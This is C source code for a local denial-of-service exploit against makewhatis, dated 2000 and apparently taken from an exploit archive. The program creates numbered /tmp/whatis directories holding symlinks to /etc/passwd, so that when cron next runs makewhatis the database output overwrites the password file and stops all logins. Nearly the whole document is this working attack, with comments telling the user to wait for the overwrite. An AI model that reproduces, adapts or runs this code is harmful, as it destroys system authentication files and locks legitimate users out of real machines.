makewhatis local dos exploit - overwrites /etc/passwd as soon as makewhatis runs, usually from cron.
cdb2304ec7442f32b6ef9838ca5f9055ec18ed08472c3e7cab9d1e6986337c97
/* mw-exp.c makewhatis exploit */
/* grazer@hit2000.org <-- mail comments.. */
/* After running this file.. wait (one day on caldera system) */
/* until makewhatis is ran again */
/* when it is ran, the database will be written to /etc/passwd */
/* making it impossible to login. */
/* gtx to #hit2000 and #darknet */
/* 15-7-2000 GrAzEr1 */
#include<stdio.h>
#define TARGET_FILE "/etc/passwd "
main()
{
char cmd[102], temp[102], cmd2[102];
char *mkdir = "mkdir /tmp/whatis", *w = "w", *slash = "/";
char *symlink = "ln -s ", *whatis = "/tmp/whatis";
int scores[102];
int i = 0;
while(i<=100) /* define the range of the process id here,
there might be a lot directories needed
to let this sploit work. (advise : 10000 ? ) */
{
i++;
scores[i]=i;
strcpy(cmd, mkdir);
strcpy(cmd2, symlink);
sprintf(temp,"%d",scores[i]);
strcat(cmd, temp);
strcat(cmd2, TARGET_FILE);
strcat(cmd2, whatis);
strcat(cmd2, temp);
strcat(cmd2, slash);
strcat(cmd2, w);
printf("\n Hold on. Making dirs and symlinks (/tmp) \n");
system("clear");
system(cmd);
system(cmd2);
}
printf (" Now sit back and relax until makewhatis is ran again.. :-)
\n");
}